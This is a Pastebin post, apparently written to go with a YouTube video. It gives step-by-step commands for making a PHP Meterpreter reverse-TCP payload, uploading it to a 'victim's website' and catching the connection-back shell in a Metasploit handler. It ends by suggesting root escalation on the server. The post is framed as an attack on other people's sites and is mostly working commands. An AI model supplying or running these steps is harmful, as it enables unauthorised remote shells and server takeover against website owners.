Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- First thing your going to need to do is figure a clever way to get local access to your victim's website.
- Steps:
- Step #1:
- Open a Terminal and type in:
- msfpayload php/meterpreter/reverse_tcp LHOST=YOURIPHERE LPORT=4444 R > filename.php
- You will need your External IP Address and possibly need to port forward if behind a router because the victims website might not
- be able to connect back to your if the router is blocking the port.
- Step #2:
- You will need to edit the php file you make it is saved in your Home folder for linux so whatever your linux login name it should be
- in that users home folder.
- You will need to edit this php file and ONLY! remove the # in front of the <?php there is a #<?php remove the # save it and upload it
- to your victims website.
- Step #3:
- Open a Terminal and type in:
- msfconsole
- Wait for msfconsole to load then type:
- use multi/handler
- press ENTER
- type:
- set PAYLOAD php/meterpreter/reverse_tcp
- press ENTER
- type:
- set LHOST YOURIPHERE
- press ENTER
- Type: set LPORT 4444
- press ENTER
- type:
- exploit -z -j
- press ENTER
- now go to the victims website can run the php file you made on there website from your browser check the msfconsle !
- type:
- sessions
- If there are any sessions showing take not of the number under then ID in my case mine was 1 so i type
- sessions -i 1
- press ENTER
- BOOM!!! We got Meterpreter!!!
- from here you can run linux commands and possibly root the server if there is a local root exploit
- Your on your own from here!
- Enjoy!
- Theses are the steps for the following video on youtube: http://youtu.be/EYxLtSuzwDM
- As I wasn't able to post this full thing into the Discription !
- Check out www.zarabyte.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement